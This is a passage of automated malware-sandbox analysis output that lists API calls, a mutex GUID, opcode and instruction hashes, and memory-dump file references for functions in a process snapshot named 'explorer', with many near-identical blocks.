  • Part of subcall function 00C1033C: _invalid_parameter_noinfo.LIBCMT ref: 00C10350
• _errno.LIBCMT ref: 00C09961
• _errno.LIBCMT ref: 00C0997D
• _isatty.LIBCMT ref: 00C099DE
• _getbuf.LIBCMT ref: 00C099EA
Yara matches
Similarity
• API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
• String ID:
• API String ID: 2574049805-0
• Opcode ID: 8d167e31e7b355235cab2c22b5f9026b19da0db631f1733dee913b6a4d6bec95
• Instruction ID: 202e0975809269334b0ea4f03c615c24f6a8ea022db94cfb5094a3dc48a9d93f
• Opcode Fuzzy Hash: 8d167e31e7b355235cab2c22b5f9026b19da0db631f1733dee913b6a4d6bec95
• Instruction Fuzzy Hash: E9411572310B448ADB189F39D45236D7760E784F64F24421AEBBA473D6EB78CA91D780
APIs
Yara matches
Similarity
• API ID: Create$CloseEventHandle$Thread
• String ID:
• API String ID: 3315681087-0
• Opcode ID: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
• Instruction ID: 016d1524d99ed20f6c8b3b4a10929b5b74fa09a69b8c8ef1313c85aea65435f3
• Opcode Fuzzy Hash: 75d140b14a8b61b3ac78a521865084d2b42c1e628267827f94a05f541de129ef
• Instruction Fuzzy Hash: F421F734610A8082FB649B21F879F9A37A0F355359F105329D94682AA4CF7D84C8E702
APIs
Yara matches
Similarity
• API ID: Event
• String ID:
• API String ID: 4201588131-0
• Opcode ID: 7116d6ac67ac5e04653390e877c86ca050781f403fb5702899428b16223cb2fc
• Instruction ID: 71eac5dd277637fb66222cfefef1e92f113efc5e810b01d692fd91f8da6334ac
• Opcode Fuzzy Hash: 7116d6ac67ac5e04653390e877c86ca050781f403fb5702899428b16223cb2fc
• Instruction Fuzzy Hash: 66213E36608B88C6DB24DB05E4A472EB7A1F3D8B99F505215EA8D43B28CF7CC558CF44
APIs
Strings
Yara matches
Similarity
• API ID: _errno_fltout2_invalid_parameter_noinfo
• String ID: -
• API String ID: 485257318-2547889144
• Opcode ID: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
• Instruction ID: c88eba061a36a2b7ec72fb2c095da83d1b69b59a982c13d68ca4885ee374b004
• Opcode Fuzzy Hash: f71b6384175b464f91dd1cf97e559d4d32636d652ffd11b7722b2513aca7f18f
• Instruction Fuzzy Hash: FA31FB2230478486DB259F26F84079EB760E796BE4F248216EF9807B99DF3DC5C5EB00
APIs
Strings
• {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 00BEE9E4
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
Yara matches
Similarity
• API ID: CloseHandleMutexOpenSleep
• String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
• API String ID: 2969294566-1719058712
APIs
Strings
• {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 00BEEADE
Yara matches
Similarity
• API ID: Sleep$CloseHandleMutexOpen
• String ID: {CCEFB138-B038-41E1-AC53-171A4E58AB6A}
• API String ID: 2551712853-1719058712
APIs
Yara matches
Similarity
• API ID: lstrlen$AllocLocal
• String ID:
• API String ID: 2140729754-0
APIs
Yara matches
Similarity
• API ID: Local$Free$Alloc
• String ID:
• API String ID: 3098330729-0
APIs
  • Part of subcall function 00C08548: _getptd.LIBCMT ref: 00C0854C
• _getptd.LIBCMT ref: 00C0B047
  • Part of subcall function 00C0AC68: _amsg_exit.LIBCMT ref: 00C0AC7E
• _SetImageBase.LIBCMT ref: 00C0B11A
• _getptd.LIBCMT ref: 00C0B148
• _getptd.LIBCMT ref: 00C0B156
Yara matches
Similarity
• API ID: _getptd$BaseImage_amsg_exit
• String ID:
• API String ID: 2306399499-0
APIs
• _lock.LIBCMT ref: 00C128C8
  • Part of subcall function 00C10B64: _amsg_exit.LIBCMT ref: 00C10B8E
• fclose.LIBCMT ref: 00C128F8
• DeleteCriticalSection.KERNEL32(?,?,?,?,?,00C10227), ref: 00C1291C
• free.LIBCMT ref: 00C1292D
Yara matches
Similarity
• API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
• String ID:
• API String ID: 594724896-0
APIs
Yara matches
Similarity
• API ID: _amsg_exit$_getptd_lockfree
• String ID:
• API String ID: 2148533958-0
APIs
• FlsFree.KERNEL32(?,?,?,?,00C0AE39,?,?,00000000,00C0981F), ref: 00C0AB13
• DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0AE39), ref: 00C10A0F
• free.LIBCMT ref: 00C10A18
• DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0AE39), ref: 00C10A3F
Yara matches
Similarity
• API ID: CriticalDeleteSection$Freefree
• String ID:
• API String ID: 1250194111-0
APIs
Yara matches
Similarity
• API ID: _amsg_exit_getptd$_lock
• String ID:
• API String ID: 3670291111-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                            • Instruction ID: d0a70a8c17bc86ee2ddf8396bdb451ed69af08b28f78bbdacaaac1cfd1219bdb
                                                                            • Opcode Fuzzy Hash: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                            • Instruction Fuzzy Hash: BFF09230900E5081F7149F1AFCB8B5833A2F786B59F648315D40AA6AB8CF7C88CDE712
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: c0ac94fd53c9be6ddf8ab387b376ddcce9b1106a022f3e2794b766a36c00cf22
                                                                            • Instruction ID: efb8536dca41243fb9c0a4feead94ddcb3f677d42f0be248315514c96d268525
                                                                            • Opcode Fuzzy Hash: c0ac94fd53c9be6ddf8ab387b376ddcce9b1106a022f3e2794b766a36c00cf22
                                                                            • Instruction Fuzzy Hash: C2F07F38600E4083FB249F16EC78B6463A0F796B69F500315D81A862B8CF7C88C9E302
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: B
                                                                            • API String ID: 2959964966-1255198513
                                                                            • Opcode ID: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                                                                            • Instruction ID: 8213fd0bfcc095dc8e1b4c4b94c3b0ebc65234f7f26040f8cd13d48750bbb35e
                                                                            • Opcode Fuzzy Hash: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                                                                            • Instruction Fuzzy Hash: 9021B072B04A60C9EB12DFB5E85079C3B74E704BA8F548221AE9A1ABD9DF38C549D700
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 12948df0c498c71752decdfb20f4046d16fa531f621b976a4d48b112d2b8850d
                                                                            • Instruction ID: 5c43f085337adfc1e9c0900740dedd8ac5365c2db6ee83abf0e2af170e7653e6
                                                                            • Opcode Fuzzy Hash: 12948df0c498c71752decdfb20f4046d16fa531f621b976a4d48b112d2b8850d
                                                                            • Instruction Fuzzy Hash: B4016636628A84C2EB259B55F8A476E7371F7C8B91F504212EA4E43764CE38D98DDB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: a2293f295a2fa7d97544b2817141554d3648111c2d3c3cc1c630462ab1cacff4
                                                                            • Instruction ID: 5c43f085337adfc1e9c0900740dedd8ac5365c2db6ee83abf0e2af170e7653e6
                                                                            • Opcode Fuzzy Hash: a2293f295a2fa7d97544b2817141554d3648111c2d3c3cc1c630462ab1cacff4
                                                                            • Instruction Fuzzy Hash: B4016636628A84C2EB259B55F8A476E7371F7C8B91F504212EA4E43764CE38D98DDB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 349387b39aee734f2e1a217bf4617260ce4ec2a9e2100056ec747b03cee3a5c8
                                                                            • Instruction ID: 5c43f085337adfc1e9c0900740dedd8ac5365c2db6ee83abf0e2af170e7653e6
                                                                            • Opcode Fuzzy Hash: 349387b39aee734f2e1a217bf4617260ce4ec2a9e2100056ec747b03cee3a5c8
                                                                            • Instruction Fuzzy Hash: B4016636628A84C2EB259B55F8A476E7371F7C8B91F504212EA4E43764CE38D98DDB00
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
                                                                            • Instruction ID: 3bbb69d34e733559cd660b6f44448c72b269daf94a03af583641f45dc1d0e095
                                                                            • Opcode Fuzzy Hash: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
                                                                            • Instruction Fuzzy Hash: 6301A420104A6492FB219B14F8B8BBA33A1F385B65F640365D64A826B0CFBC88CED305
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 01f9c0b65a60e50d8fa6dda341f56b99c4a3bf48c253a9652d73433e2a8fe8a7
                                                                            • Instruction ID: 3bbb69d34e733559cd660b6f44448c72b269daf94a03af583641f45dc1d0e095
                                                                            • Opcode Fuzzy Hash: 01f9c0b65a60e50d8fa6dda341f56b99c4a3bf48c253a9652d73433e2a8fe8a7
                                                                            • Instruction Fuzzy Hash: 6301A420104A6492FB219B14F8B8BBA33A1F385B65F640365D64A826B0CFBC88CED305
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                            • Instruction ID: 3bbb69d34e733559cd660b6f44448c72b269daf94a03af583641f45dc1d0e095
                                                                            • Opcode Fuzzy Hash: 82d95b7103033d902948a90c9e8e53d16c8e26a2043a74430fc3d0cce4b7eb71
                                                                            • Instruction Fuzzy Hash: 6301A420104A6492FB219B14F8B8BBA33A1F385B65F640365D64A826B0CFBC88CED305
                                                                            APIs
                                                                            Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 407ad451bf2e2bf966aa73b9f4abba4dafead0985304cf0f56f4df019bbe3795
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 7a11eaf5b6decfaec6b1ebbcad1cf123de54f51fc7bafbc7f171939df23a1507
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 97c120b3682c5ed04db4746d2c43bdfd2237f865d6f77661787bc7a0d9153a52
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 97c120b3682c5ed04db4746d2c43bdfd2237f865d6f77661787bc7a0d9153a52
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 3edb39da4be888a4e78e7200a33b6930fa08532986cacb0a95628ca783af63a6
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 3edb39da4be888a4e78e7200a33b6930fa08532986cacb0a95628ca783af63a6
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
Yara matches
Similarity
• API ID: CloseFreeHandleLocal
• String ID:
• API String ID: 836400252-0
• Opcode ID: 03c3a733a97b371f1f42efaee49954e42a73cd089242ffe169e8e5e154ab26d8
• Instruction ID: 2801a59183252a1eb93d0448d6df225bc6a624e02f40276663c9f8921f9b58fb
• Opcode Fuzzy Hash: 03c3a733a97b371f1f42efaee49954e42a73cd089242ffe169e8e5e154ab26d8
• Instruction Fuzzy Hash: 3DF0C921214CC181FB219B56F8B8B6D63A0F780B69F502375E54A865B4CFBCC8CEDB01
APIs
Memory Dump Source
• Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmp
